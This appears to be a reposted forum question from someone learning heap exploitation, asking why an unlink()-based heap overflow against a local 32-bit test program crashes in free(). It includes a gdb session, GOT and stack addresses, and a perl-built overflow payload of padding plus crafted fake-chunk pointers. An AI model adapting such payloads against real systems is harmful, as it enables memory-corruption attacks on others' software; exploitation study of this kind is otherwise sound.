I have been trying to exploit the heap overflow vulnerability for the program
below,I am running Linux 14.04.
In this exploit i am trying to write a 32 bit random address of stack into
variable "n" present in the program,using the unlink() technique
However when the free() is called the program segfaults .
This is my input
(gdb) p &n
$1 = ( *) 0x804a02c
(gdb) x/xw 0x804a02c-0xc (address-12 bytes)
0x804a020 <__libc_start_main@got.plt>: 0xb7e27990
(gdb) x/2xw $ebp
0xbffff1c8: 0x00000000 0xb7e27a83
0xbffff1c8+4bytes=0xbffff1cc
(gdb) r perl -e 'print "A"x1024 . "\xfc\xff\xff\xbf"x2 . "XXXX" . "\x20\xa0\x04\x08" . "\xcc\xff\xff\xbf"'
The program being debugged has been started already. Start it from the beginning? (y or n) y
Starting program: /home/HIIII/heap_overflow/test/heap_1 perl -e 'print "A"x1024 . "\xfc\xff\xff\xbf"x2 . "XXXX" . "\x20\xa0\x04\x08" . "\xcc\xff\xff\xbf"'
Program received signal SIGSEGV, Segmentation fault.
=> 0xb7e857e0 <__GI___libc_free+64>: mov (%eax),%eax 0xb7e857e2 <__GI___libc_free+66>: movl $0x0,0x20(%esp) 0xb7e857ea <__GI___libc_free+74>: add $0x18,%esp 0xb7e857ed <__GI___libc_free+77>: pop %ebx 0xb7e857ee <__GI___libc_free+78>: jmp 0xb7e82520 <_int_free> 0xb7e857f3 <__GI___libc_free+83>: nop
0xbffff180: 0xbffff1c8 0xb7ff2500 0x0804b412 0xb7e857a0
0xbffff190: 0x0804b410 0xb7e857a6 0xb7fb9000 0x08048500
0xbffff1a0: 0x0804b410 0xbffff3d6
0xb7e857e0 in __GI___libc_free (mem=0x804b410) at malloc.c:2945 2945 malloc.c: No such file or directory.
I have taken this attack vector from http://ift.tt/1HahdxR(uses glibc-2.2.4)
Thanks in advance
Aucun commentaire:
Enregistrer un commentaire